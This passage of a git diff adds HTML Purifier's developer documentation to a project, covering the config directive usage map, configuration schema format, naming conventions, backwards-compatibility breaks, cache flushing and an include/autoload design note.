+ <line>276</line> + </file> + </directive> + <directive id="HTML.SafeIframe"> + <file name="HTMLPurifier/HTMLModule/Iframe.php"> + <line>17</line> + </file> + <file name="HTMLPurifier/URIFilter/SafeIframe.php"> + <line>23</line> + </file> + </directive> + <directive id="HTML.MaxImgLength"> + <file name="HTMLPurifier/HTMLModule/Image.php"> + <line>14</line> + </file> + <file name="HTMLPurifier/HTMLModule/SafeEmbed.php"> + <line>13</line> + </file> + <file name="HTMLPurifier/HTMLModule/SafeObject.php"> + <line>19</line> + </file> + </directive> + <directive id="HTML.TidyLevel"> + <file name="HTMLPurifier/HTMLModule/Tidy.php"> + <line>45</line> + </file> + </directive> + <directive id="HTML.TidyAdd"> + <file name="HTMLPurifier/HTMLModule/Tidy.php"> + <line>49</line> + </file> + </directive> + <directive id="HTML.TidyRemove"> + <file name="HTMLPurifier/HTMLModule/Tidy.php"> + <line>50</line> + </file> + </directive> + <directive id="AutoFormat.PurifierLinkify.DocURL"> + <file name="HTMLPurifier/Injector/PurifierLinkify.php"> + <line>15</line> + </file> + </directive> + <directive id="AutoFormat.RemoveEmpty.RemoveNbsp"> + <file name="HTMLPurifier/Injector/RemoveEmpty.php"> + <line>12</line> + </file> + </directive> + <directive id="AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions"> + <file name="HTMLPurifier/Injector/RemoveEmpty.php"> + <line>13</line> + </file> + </directive> + <directive id="Core.AggressivelyFixLt"> + <file name="HTMLPurifier/Lexer/DOMLex.php"> + <line>44</line> + </file> + </directive> + <directive id="Core.DirectLexLineNumberSyncInterval"> + <file name="HTMLPurifier/Lexer/DirectLex.php"> + <line>70</line> + </file> + </directive> + <directive id="Core.EscapeInvalidTags"> + <file name="HTMLPurifier/Strategy/MakeWellFormed.php"> + <line>53</line> + </file> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>19</line> + </file> + </directive> + <directive id="HTML.AllowedComments"> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>24</line> + </file> + </directive> + <directive id="HTML.AllowedCommentsRegexp"> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>25</line> + </file> + </directive> + <directive id="Core.RemoveScriptContents"> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>28</line> + </file> + </directive> + <directive id="Core.HiddenElements"> + <file name="HTMLPurifier/Strategy/RemoveForeignElements.php"> + <line>29</line> + </file> + </directive> + <directive id="URI.HostBlacklist"> + <file name="HTMLPurifier/URIFilter/HostBlacklist.php"> + <line>12</line> + </file> + </directive> + <directive id="URI.MungeResources"> + <file name="HTMLPurifier/URIFilter/Munge.php"> + <line>14</line> + </file> + </directive> + <directive id="URI.MungeSecretKey"> + <file name="HTMLPurifier/URIFilter/Munge.php"> + <line>15</line> + </file> + </directive> + <directive id="URI.SafeIframeRegexp"> + <file name="HTMLPurifier/URIFilter/SafeIframe.php"> + <line>18</line> + </file> + </directive> +</usage> diff --git a/lib/htmlpurifier/docs/dev-advanced-api.html b/lib/htmlpurifier/docs/dev-advanced-api.html new file mode 100644 index 000000000..5b7aaa3c8 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-advanced-api.html @@ -0,0 +1,26 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Specification for HTML Purifier's advanced API for defining custom filtering behavior." /> +<link rel="stylesheet" type="text/css" href="style.css" /> + +<title>Advanced API - HTML Purifier</title> + +</head><body> + +<h1>Advanced API</h1> + +<div id="filing">Filed under Development</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p> + Please see <a href="enduser-customize.html">Customize!</a> +</p> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/dev-code-quality.txt b/lib/htmlpurifier/docs/dev-code-quality.txt new file mode 100644 index 000000000..bceedebc4 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-code-quality.txt @@ -0,0 +1,29 @@ + +Code Quality Issues + +Okay, face it. Programmers can get lazy, cut corners, or make mistakes. They +also can do quick prototypes, and then forget to rewrite them later. Well, +while I can't list mistakes in here, I can list prototype-like segments +of code that should be aggressively refactored. This does not list +optimization issues, that needs to be done after intense profiling. + +docs/examples/demo.php - ad hoc HTML/PHP soup to the extreme + +AttrDef - a lot of duplication, more generic classes need to be created; +a lot of strtolower() calls, no legit casing + Class - doesn't support Unicode characters (fringe); uses regular expressions + Lang - code duplication; premature optimization + Length - easily mistaken for CSSLength + URI - multiple regular expressions; missing validation for parts (?) + CSS - parser doesn't accept advanced CSS (fringe) + Number - constructor interface inconsistent with Integer +Strategy + FixNesting - cannot bubble nodes out of structures, duplicated checks + for special-case parent node + RemoveForeignElements - should be run in parallel with MakeWellFormed +URIScheme - needs to have callable generic checks + mailto - doesn't validate emails, doesn't validate querystring + news - doesn't validate opaque path + nntp - doesn't constrain path + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/dev-config-bcbreaks.txt b/lib/htmlpurifier/docs/dev-config-bcbreaks.txt new file mode 100644 index 000000000..29a58ca2f --- /dev/null +++ b/lib/htmlpurifier/docs/dev-config-bcbreaks.txt @@ -0,0 +1,79 @@ + +Configuration Backwards-Compatibility Breaks + +In version 4.0.0, the configuration subsystem (composed of the outwards +facing Config class, as well as the ConfigSchema and ConfigSchema_Interchange +subsystems), was significantly revamped to make use of property lists. +While most of the changes are internal, some internal APIs were changed for the +sake of clarity. HTMLPurifier_Config was kept completely backwards compatible, +although some of the functions were retrofitted with an unambiguous alternate +syntax. Both of these changes are discussed in this document. + + + +1. Outwards Facing Changes +-------------------------------------------------------------------------------- + +The HTMLPurifier_Config class now takes an alternate syntax. The general rule +is: + + If you passed $namespace, $directive, pass "$namespace.$directive" + instead. + +An example: + + $config->set('HTML', 'Allowed', 'p'); + +becomes: + + $config->set('HTML.Allowed', 'p'); + +New configuration options may have more than one namespace, they might +look something like %Filter.YouTube.Blacklist. While you could technically +set it with ('HTML', 'YouTube.Blacklist'), the logical extension +('HTML', 'YouTube', 'Blacklist') does not work. + +The old API will still work, but will emit E_USER_NOTICEs. + + + +2. Internal API Changes +-------------------------------------------------------------------------------- + +Some overarching notes: we've completely eliminated the notion of namespace; +it's now an informal construct for organizing related configuration directives. + +Also, the validation routines for keys (formerly "$namespace.$directive") +have been completely relaxed. I don't think it really should be necessary. + +2.1 HTMLPurifier_ConfigSchema + +First off, if you're interfacing with this class, you really shouldn't. +HTMLPurifier_ConfigSchema_Builder_ConfigSchema is really the only class that +should ever be creating HTMLPurifier_ConfigSchema, and HTMLPurifier_Config the +only class that should be reading it. + +All namespace related methods were removed; they are completely unnecessary +now. Any $namespace, $name arguments must be replaced with $key (where +$key == "$namespace.$name"), including for addAlias(). + +The $info and $defaults member variables are no longer indexed as +[$namespace][$name]; they are now indexed as ["$namespace.$name"]. + +All deprecated methods were finally removed, after having yelled at you as +an E_USER_NOTICE for a while now. + +2.2 HTMLPurifier_ConfigSchema_Interchange + +Member variable $namespaces was removed. + +2.3 HTMLPurifier_ConfigSchema_Interchange_Id + +Member variable $namespace and $directive removed; member variable $key added. +Any method that took $namespace, $directive now takes $key. + +2.4 HTMLPurifier_ConfigSchema_Interchange_Namespace + +Removed. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/dev-config-naming.txt b/lib/htmlpurifier/docs/dev-config-naming.txt new file mode 100644 index 000000000..66db5bce3 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-config-naming.txt @@ -0,0 +1,164 @@ +Configuration naming + +HTML Purifier 4.0.0 features a new configuration naming system that +allows arbitrary nesting of namespaces. While there are certain cases +in which using two namespaces is obviously better (the canonical example +is where we were using AutoFormatParam to contain directives for AutoFormat +parameters), it is unclear whether or not a general migration to highly +namespaced directives is a good idea or not. + +== Case studies == + +=== Attr.* === + +We have a dead duck HTML.Attr.Name.UseCDATA which migrated before we decided +to think this out thoroughly. + +We currently have a large number of directives in the Attr.* namespace. +These directives tweak the behavior of some HTML attributes. They have +the properties: + +* While they apply to only one attribute at a time, the attribute can + span over multiple elements (not necessarily all attributes, either). + The information of which elements it impacts is either omitted or + informally stated (EnableID applies to all elements, DefaultImageAlt + applies to <img> tags, AllowedRev doesn't say but only applies to a tags). + +* There is a certain degree of clustering that could be applied, especially + to the ID directives. The clustering could be done with respect to + what element/attribute was used, i.e. + + *.id -> EnableID, IDBlacklistRegexp, IDBlacklist, IDPrefixLocal, IDPrefix + img.src -> DefaultInvalidImage + img.alt -> DefaultImageAlt, DefaultInvalidImageAlt + bdo.dir -> DefaultTextDir + a.rel -> AllowedRel + a.rev -> AllowedRev + a.target -> AllowedFrameTargets + a.name -> Name.UseCDATA + +* The directives often reference generic attribute types that were specified + in the DTD/specification. However, some of the behavior specifically relies + on the fact that other use cases of the attribute are not, at current, + supported by HTML Purifier. + + AllowedRel, AllowedRev -> heavily <a> specific; if <link> ends up being + allowed, we will also have to give users specificity there (we also + want to preserve generality) DTD %Linktypes, HTML5 distinguishes + between <link> and <a>/<area> + AllowedFrameTargets -> heavily <a> specific, but also used by <area> + and <form>. Transitional DTD %FrameTarget, not present in strict, + HTML5 calls them "browsing contexts" + Default*Image* -> as a default parameter, is almost entirely exlcusive + to <img> + EnableID -> global attribute + Name.UseCDATA -> heavily <a> specific, but has heavy other usage by + many things + +== AutoFormat.* == + +These have the fairly normal pluggable architecture that lends itself to +large amounts of namespaces (pluggability may be the key to figuring +out when gratuitous namespacing is good.) Properties: + +* Boolean directives are fair game for being namespaced: for example, + RemoveEmpty.RemoveNbsp triggers RemoveEmpty.RemoveNbsp.Exceptions, + the latter of which only makes sense when RemoveEmpty.RemoveNbsp + is set to true. (The same applies to RemoveNbsp too) + +The AutoFormat string is a bit long, but is the only bit of repeated +context. + +== Core.* == + +Core is the potpourri of directives, mostly regarding some minor behavioral +tweaks for HTML handling abilities. + + AggressivelyFixLt + ConvertDocumentToFragment + DirectLexLineNumberSyncInterval + LexerImpl + MaintainLineNumbers + Lexer + CollectErrors + Language + Error handling (Language is ostensibly a little more general, but + it's only used for error handling right now) + ColorKeywords + CSS and HTML + Encoding + EscapeNonASCIICharacters + Character encoding + EscapeInvalidChildren + EscapeInvalidTags + HiddenElements + RemoveInvalidImg + Lexing/Output + RemoveScriptContents + Deprecated + +== HTML.* == + + AllowedAttributes + AllowedElements + AllowedModules + Allowed + ForbiddenAttributes + ForbiddenElements + Element set tuning + BlockWrapper + Child def advanced twiddle + CoreModules + CustomDoctype + Advanced HTMLModuleManager twiddles + DefinitionID + DefinitionRev + Caching + Doctype + Parent + Strict + XHTML + Global environment + MaxImgLength + Attribute twiddle? (applies to two attributes) + Proprietary + SafeEmbed + SafeObject + Trusted + Extra functionality/tagsets + TidyAdd + TidyLevel + TidyRemove + Tidy + +== Output.* == + +These directly affect the output of Generator. These are all advanced +twiddles. + +== URI.* == + + AllowedSchemes + OverrideAllowedSchemes + Scheme tuning + Base + DefaultScheme + Host + Global environment + DefinitionID + DefinitionRev + Caching + DisableExternalResources + DisableExternal + DisableResources + Disable + Contextual/authority tuning + HostBlacklist + Authority tuning + MakeAbsolute + MungeResources + MungeSecretKey + Munge + Transformation behavior (munge can be grouped) + + diff --git a/lib/htmlpurifier/docs/dev-config-schema.html b/lib/htmlpurifier/docs/dev-config-schema.html new file mode 100644 index 000000000..07aecd35a --- /dev/null +++ b/lib/htmlpurifier/docs/dev-config-schema.html @@ -0,0 +1,412 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + <head> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <meta name="description" content="Describes config schema framework in HTML Purifier." /> + <link rel="stylesheet" type="text/css" href="./style.css" /> + <title>Config Schema - HTML Purifier</title> + </head> + <body> + + <h1>Config Schema</h1> + + <div id="filing">Filed under Development</div> + <div id="index">Return to the <a href="index.html">index</a>.</div> + <div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + + <p> + HTML Purifier has a fairly complex system for configuration. Users + interact with a <code>HTMLPurifier_Config</code> object to + set configuration directives. The values they set are validated according + to a configuration schema, <code>HTMLPurifier_ConfigSchema</code>. + </p> + + <p> + The schema is mostly transparent to end-users, but if you're doing development + work for HTML Purifier and need to define a new configuration directive, + you'll need to interact with it. We'll also talk about how to define + userspace configuration directives at the very end. + </p> + + <h2>Write a directive file</h2> + + <p> + Directive files define configuration directives to be used by + HTML Purifier. They are placed in <code>library/HTMLPurifier/ConfigSchema/schema/</code> + in the form <code><em>Namespace</em>.<em>Directive</em>.txt</code> (I + couldn't think of a more descriptive file extension.) + Directive files are actually what we call <code>StringHash</code>es, + i.e. associative arrays represented in a string form reminiscent of + <a href="http://qa.php.net/write-test.php">PHPT</a> tests. Here's a + sample directive file, <code>Test.Sample.txt</code>: + </p> + + <pre>Test.Sample +TYPE: string/null +DEFAULT: NULL +ALLOWED: 'foo', 'bar' +VALUE-ALIASES: 'baz' => 'bar' +VERSION: 3.1.0 +--DESCRIPTION-- +This is a sample configuration directive for the purposes of the +<code>dev-config-schema.html<code> documentation. +--ALIASES-- +Test.Example</pre> + + <p> + Each of these segments has a specific meaning: + </p> + + <table class="table"> + <thead> + <tr> + <th>Key</th> + <th>Example</th> + <th>Description</th> + </tr> + </thead> + <tbody> + <tr> + <td>ID</td> + <td>Test.Sample</td> + <td>The name of the directive, in the form Namespace.Directive + (implicitly the first line)</td> + </tr> + <tr> + <td>TYPE</td> + <td>string/null</td> + <td>The type of variable this directive accepts. See below for + details. You can also add <code>/null</code> to the end of + any basic type to allow null values too.</td> + </tr> + <tr> + <td>DEFAULT</td> + <td>NULL</td> + <td>A parseable PHP expression of the default value.</td> + </tr> + <tr> + <td>DESCRIPTION</td> + <td>This is a...</td> + <td>An HTML description of what this directive does.</td> + </tr> + <tr> + <td>VERSION</td> + <td>3.1.0</td> + <td><em>Recommended</em>. The version of HTML Purifier this directive was added. + Directives that have been around since 1.0.0 don't have this, + but any new ones should.</td> + </tr> + <tr> + <td>ALIASES</td> + <td>Test.Example</td> + <td><em>Optional</em>. A comma separated list of aliases for this directive. + This is most useful for backwards compatibility and should + not be used otherwise.</td> + </tr> + <tr> + <td>ALLOWED</td> + <td>'foo', 'bar'</td> + <td><em>Optional</em>. Set of allowed value for a directive, + a comma separated list of parseable PHP expressions. This + is only allowed string, istring, text and itext TYPEs.</td> + </tr> + <tr> + <td>VALUE-ALIASES</td> + <td>'baz' => 'bar'</td> + <td><em>Optional</em>. Mapping of one value to another, and + should be a comma separated list of keypair duples. This + is only allowed string, istring, text and itext TYPEs.</td> + </tr> + <tr> + <td>DEPRECATED-VERSION</td> + <td>3.1.0</td> + <td><em>Not shown</em>. Indicates that the directive was + deprecated this version.</td> + </tr> + <tr> + <td>DEPRECATED-USE</td> + <td>Test.NewDirective</td> + <td><em>Not shown</em>. Indicates what new directive should be + used instead. Note that the directives will functionally be + different, although they should offer the same functionality. + If they are identical, use an alias instead.</td> + </tr> + <tr> + <td>EXTERNAL</td> + <td>CSSTidy</td> + <td><em>Not shown</em>. Indicates if there is an external library + the user will need to download and install to use this configuration + directive. As of right now, this is merely a Google-able name; future + versions may also provide links and instructions.</td> + </tr> + </tbody> + </table> + + <p> + Some notes on format and style: + </p> + + <ul> + <li> + Each of these keys can be expressed in the short format + (<code>KEY: Value</code>) or the long format + (<code>--KEY--</code> with value beneath). You must use the + long format if multiple lines are needed, or if a long format + has been used already (that's why <code>ALIASES</code> in our + example is in the long format); otherwise, it's user preference. + </li> + <li> + The HTML descriptions should be wrapped at about 80 columns; do + not rely on editor word-wrapping. + </li> + </ul> + + <p> + Also, as promised, here is the set of possible types: + </p> + + <table class="table"> + <thead> + <tr> + <th>Type</th> + <th>Example</th> + <th>Description</th> + </tr> + </thead> + <tbody> + <tr> + <td>string</td> + <td>'Foo'</td> + <td><a href="http://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td> + </tr> + <tr> + <td>istring</td> + <td>'foo'</td> + <td>Case insensitive ASCII string without newlines</td> + </tr> + <tr> + <td>text</td> + <td>"A<em>\n</em>b"</td> + <td>String with newlines</td> + </tr> + <tr> + <td>itext</td> + <td>"a<em>\n</em>b"</td> + <td>Case insensitive ASCII string without newlines</td> + </tr> + <tr> + <td>int</td> + <td>23</td> + <td>Integer</td> + </tr> + <tr> + <td>float</td> + <td>3.0</td> + <td>Floating point number</td> + </tr> + <tr> + <td>bool</td> + <td>true</td> + <td>Boolean</td> + </tr> + <tr> + <td>lookup</td> + <td>array('key' => true)</td> + <td>Lookup array, used with <code>isset($var[$key])</code></td> + </tr> + <tr> + <td>list</td> + <td>array('f', 'b')</td> + <td>List array, with ordered numerical indexes</td> + </tr> + <tr> + <td>hash</td> + <td>array('key' => 'val')</td> + <td>Associative array of keys to values</td> + </tr> + <tr> + <td>mixed</td> + <td>new stdclass</td> + <td>Any PHP variable is fine</td> + </tr> + </tbody> + </table> + + <p> + The examples represent what will be returned out of the configuration + object; users have a little bit of leeway when setting configuration + values (for example, a lookup value can be specified as a list; + HTML Purifier will flip it as necessary.) These types are defined + in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php"> + library/HTMLPurifier/VarParser.php</a>. + </p> + + <p> + For more information on what values are allowed, and how they are parsed, + consult <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php"> + library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>, as well + as <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php"> + library/HTMLPurifier/ConfigSchema/Interchange/Directive.php</a> for + the semantics of the parsed values. + </p> + + <h2>Refreshing the cache</h2> + + <p> + You may have noticed that your directive file isn't doing anything + yet. That's because it hasn't been added to the runtime + <code>HTMLPurifier_ConfigSchema</code> instance. Run + <code>maintenance/generate-schema-cache.php</code> to fix this. + If there were no errors, you're good to go! Don't forget to add + some unit tests for your functionality! + </p> + + <p> + If you ever make changes to your configuration directives, you + will need to run this script again. + </p> + <h2>Adding in-house schema definitions</h2> + + <p> + Placing stuff directly in HTML Purifier's source tree is generally not a + good idea, so HTML Purifier 4.0.0+ has some facilities in place to make your + life easier. + </p> + + <p> + The first is to pass an extra parameter to <code>maintenance/generate-schema-cache.php</code> + with the location of your directory (relative or absolute path will do). For example, + if I'm storing my custom definitions in <em>/var/htmlpurifier/myschema</em>, run: + <code>php maintenance/generate-schema-cache.php /var/htmlpurifier/myschema</code>. + </p> + + <p> + Alternatively, you can create a small loader PHP file in the HTML Purifier base + directory named <code>config-schema.php</code> (this is the same directory + you would place a <code>test-settings.php</code> file). In this file, add + the following line for each directory you want to load: + </p> + +<pre>$builder->buildDir($interchange, '/var/htmlpurifier/myschema');</pre> + + <p>You can even load a single file using:</p> + +<pre>$builder->buildFile($interchange, '/var/htmlpurifier/myschema/MyApp.Directive.txt');</pre> + + <p>Storing custom definitions that you don't plan on sending back upstream in + a separate directory is <em>definitely</em> a good idea! Additionally, picking + a good namespace can go a long way to saving you grief if you want to use + someone else's change, but they picked the same name, or if HTML Purifier + decides to add support for a configuration directive that has the same name.</p> + + <!-- TODO: how to name directives that rely on naming conventions --> + + <h2>Errors</h2> + + <p> + All directive files go through a rigorous validation process + through <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php"> + library/HTMLPurifier/ConfigSchema/Validator.php</a>, as well + as some basic checks during building. While + listing every error out here is out-of-scope for this document, we + can give some general tips for interpreting error messages. + There are two types of errors: builder errors and validation errors. + </p> + + <h3>Builder errors</h3> + + <blockquote> + <p> + <strong>Exception:</strong> Expected type string, got + integer in DEFAULT in directive hash 'Ns.Dir' + </p> + </blockquote> + + <p> + You can identify a builder error by the keyword "directive hash." + These are the easiest to deal with, because they directly correspond + with your directive file. Find the offending directive file (which + is the directive hash plus the .txt extension), find the + offending index ("in DEFAULT" means the DEFAULT key) and fix the error. + This particular error would occur if your default value is not the same + type as TYPE. + </p> + + <h3>Validation errors</h3> + + <blockquote> + <p> + <strong>Exception:</strong> Alias 3 in valueAliases in directive + 'Ns.Dir' must be a string + </p> + </blockquote> + + <p> + These are a little trickier, because we're not actually validating + your directive file, or even the direct string hash representation. + We're validating an Interchange object, and the error messages do + not mention any string hash keys. + </p> + + <p> + Nevertheless, it's not difficult to figure out what went wrong. + Read the "context" statements in reverse: + </p> + + <dl> + <dt>in directive 'Ns.Dir'</dt> + <dd>This means we need to look at the directive file <code>Ns.Dir.txt</code></dd> + <dt>in valueAliases</dt> + <dd>There's no key actually called this, but there's one that's close: + VALUE-ALIASES. Indeed, that's where to look.</dd> + <dt>Alias 3</dt> + <dd>The value alias that is equal to 3 is the culprit.</dd> + </dl> + + <p> + In this particular case, you're not allowed to alias integers values to + strings values. + </p> + + <p> + The most difficult part is translating the Interchange member variable (valueAliases) + into a directive file key (VALUE-ALIASES), but there's a one-to-one + correspondence currently. If the two formats diverge, any discrepancies + will be described in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php"> + library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>. + </p> + + <h2>Internals</h2> + + <p> + Much of the configuration schema framework's codebase deals with + shuffling data from one format to another, and doing validation on this + data. + The keystone of all of this is the <code>HTMLPurifier_ConfigSchema_Interchange</code> + class, which represents the purest, parsed representation of the schema. + </p> + + <p> + Hand-writing this data is unwieldy, however, so we write directive files. + These directive files are parsed by <code>HTMLPurifier_StringHashParser</code> + into <code>HTMLPurifier_StringHash</code>es, which then + are run through <code>HTMLPurifier_ConfigSchema_InterchangeBuilder</code> + to construct the interchange object. + </p> + + <p> + From the interchange object, the data can be siphoned into other forms + using <code>HTMLPurifier_ConfigSchema_Builder</code> subclasses. + For example, <code>HTMLPurifier_ConfigSchema_Builder_ConfigSchema</code> + generates a runtime <code>HTMLPurifier_ConfigSchema</code> object, + which <code>HTMLPurifier_Config</code> uses to validate its incoming + data. There is also an XML serializer, which is used to build documentation. + </p> + + </body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/dev-flush.html b/lib/htmlpurifier/docs/dev-flush.html new file mode 100644 index 000000000..4a3a78351 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-flush.html @@ -0,0 +1,68 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> +<head> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <meta name="description" content="Discusses when to flush HTML Purifier's various caches." /> + <link rel="stylesheet" type="text/css" href="./style.css" /> + <title>Flushing the Purifier - HTML Purifier</title> +</head> +<body> + +<h1>Flushing the Purifier</h1> + +<div id="filing">Filed under Development</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p> + If you've been poking around the various folders in HTML Purifier, + you may have noticed the <code>maintenance</code> directory. Almost + all of these scripts are devoted to flushing out the various caches + HTML Purifier uses. Normal users don't have to worry about this: + regular library usage is transparent. However, when doing development + work on HTML Purifier, you may find you have to flush one of the + caches. +</p> + +<p> + As a general rule of thumb, run <code>flush.php</code> whenever you make + any <em>major</em> changes, or when tests start mysteriously failing. + In more detail, run this script if: +</p> + +<ul> + <li> + You added new source files to HTML Purifier's main library. + (see <code>generate-includes.php</code>) + </li> + <li> + You modified the configuration schema (see + <code>generate-schema-cache.php</code>). This usually means + adding or modifying files in <code>HTMLPurifier/ConfigSchema/schema/</code>, + although in rare cases modifying <code>HTMLPurifier/ConfigSchema.php</code> + will also require this. + </li> + <li> + You modified a Definition, or its subsystems. The most usual candidate + is <code>HTMLPurifier/HTMLDefinition.php</code>, which also encompasses + the files in <code>HTMLPurifier/HTMLModule/</code> as well as if you've + <a href="enduser-customize.html">customizing definitions</a> without + the cache disabled. (see <code>flush-generation-cache.php</code>) + </li> + <li> + You modified source files, and have been using the standalone + version from the full installation. (see <code>generate-standalone.php</code>) + </li> +</ul> + +<p> + You can check out the corresponding scripts for more information on what they + do. +</p> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/dev-includes.txt b/lib/htmlpurifier/docs/dev-includes.txt new file mode 100644 index 000000000..d3382b593 --- /dev/null +++ b/lib/htmlpurifier/docs/dev-includes.txt @@ -0,0 +1,281 @@ + +INCLUDES, AUTOLOAD, BYTECODE CACHES and OPTIMIZATION + +The Problem +----------- + +HTML Purifier contains a number of extra components that are not used all +of the time, only if the user explicitly specifies that we should use +them. + +Some of these optional components are optionally included (Filter, +Language, Lexer, Printer), while others are included all the time +(Injector, URIFilter, HTMLModule, URIScheme). We will stipulate that these +are all developer specified: it is conceivable that certain Tokens are not +used, but this is user-dependent and should not be trusted. + +We should come up with a consistent way to handle these things and ensure +that we get the maximum performance when there is bytecode caches and +when there are not. Unfortunately, these two goals seem contrary to each +other. + +A peripheral issue is the performance of ConfigSchema, which has been +shown take a large, constant amount of initialization time, and is +intricately linked to the issue of includes due to its pervasive use +in our plugin architecture. + +Pros and Cons +------------- + +We will assume that user-based extensions will be included by them. + +Conditional includes: + Pros: + - User management is simplified; only a single directive needs to be set + - Only necessary code is included + Cons: + - Doesn't play nicely with opcode caches + - Adds complexity to standalone version + - Optional configuration directives are not exposed without a little + extra coaxing (not implemented yet) + +Include it all: + Pros: + - User management is still simple + - Plays nicely with opcode caches and standalone version + - All configuration directives are present + Cons: + - Lots of (how much?) extra code is included + - Classes that inherit from external libraries will cause compile + errors + +Build an include stub (Let's do this!): + Pros: + - Only necessary code is included + - Plays nicely with opcode caches and standalone version + - require (without once) can be used, see above + - Could further extend as a compilation to one file + Cons: + - Not implemented yet + - Requires user intervention and use of a command line script + - Standalone script must be chained to this + - More complex and compiled-language-like + - Requires a whole new class of system-wide configuration directives, + as configuration objects can be reused + - Determining what needs to be included can be complex (see above) + - No way of autodetecting dynamically instantiated classes + - Might be slow + +Include stubs +------------- + +This solution may be "just right" for users who are heavily oriented +towards performance. However, there are a number of picky implementation +details to work out beforehand. + +The number one concern is how to make the HTML Purifier files "work +out of the box", while still being able to easily get them into a form +that works with this setup. As the codebase stands right now, it would +be necessary to strip out all of the require_once calls. The only way +we could get rid of the require_once calls is to use __autoload or +use the stub for all cases (which might not be a bad idea). + + Aside + ----- + An important thing to remember, however, is that these require_once's + are valuable data about what classes a file needs. Unfortunately, there's + no distinction between whether or not the file is needed all the time, + or whether or not it is one of our "optional" files. Thus, it is + effectively useless. + + Deprecated + ---------- + One of the things I'd like to do is have the code search for any classes + that are explicitly mentioned in the code. If a class isn't mentioned, I + get to assume that it is "optional," i.e. included via introspection. + The choice is either to use PHP's tokenizer or use regexps; regexps would + be faster but a tokenizer would be more correct. If this ends up being + unfeasible, adding dependency comments isn't a bad idea. (This could + even be done automatically by search/replacing require_once, although + we'd have to manually inspect the results for the optional requires.) + + NOTE: This ends up not being necessary, as we're going to make the user + figure out all the extra classes they need, and only include the core + which is predetermined. + +Using the autoload framework with include stubs works nicely with +introspective classes: instead of having to have require_once inside +the function, we can let autoload do the work; we simply need to +new $class or accept the object straight from the caller. Handling filters +becomes a simple matter of ticking off configuration directives, and +if ConfigSchema spits out errors, adding the necessary includes. We could +also use the autoload framework as a fallback, in case the user forgets +to make the include, but doesn't really care about performance. + + Insight + ------- + All of this talk is merely a natural extension of what our current + standalone functionality does. However, instead of having our code + perform the includes, or attempting to inline everything that possibly + could be used, we boot the issue to the user, making them include + everything or setup the fallback autoload handler. + +Configuration Schema +-------------------- + +A common deficiency for all of the conditional include setups (including +the dynamically built include PHP stub) is that if one of this +conditionally included files includes a configuration directive, it +is not accessible to configdoc. A stopgap solution for this problem is +to have it piggy-back off of the data in the merge-library.php script +to figure out what extra files it needs to include, but if the file also +inherits classes that don't exist, we're in big trouble. + +I think it's high time we centralized the configuration documentation. +However, the type checking has been a great boon for the library, and +I'd like to keep that. The compromise is to use some other source, and +then parse it into the ConfigSchema internal format (sans all of those +nasty documentation strings which we really don't need at runtime) and +serialize that for future use. + +The next question is that of format. XML is very verbose, and the prospect +of setting defaults in it gives me willies. However, this may be necessary. +Splitting up the file into manageable chunks may alleviate this trouble, +and we may be even want to create our own format optimized for specifying +configuration. It might look like (based off the PHPT format, which is +nicely compact yet unambiguous and human-readable): + +Core.HiddenElements +TYPE: lookup +DEFAULT: array('script', 'style') // auto-converted during processing +--ALIASES-- +Core.InvisibleElements, Core.StupidElements +--DESCRIPTION-- +<p> + Blah blah +</p> + +The first line is the directive name, the lines after that prior to the +first --HEADER-- block are single-line values, and then after that +the multiline values are there. No value is restricted to a particular +format: DEFAULT could very well be multiline if that would be easier. +This would make it insanely easy, also, to add arbitrary extra 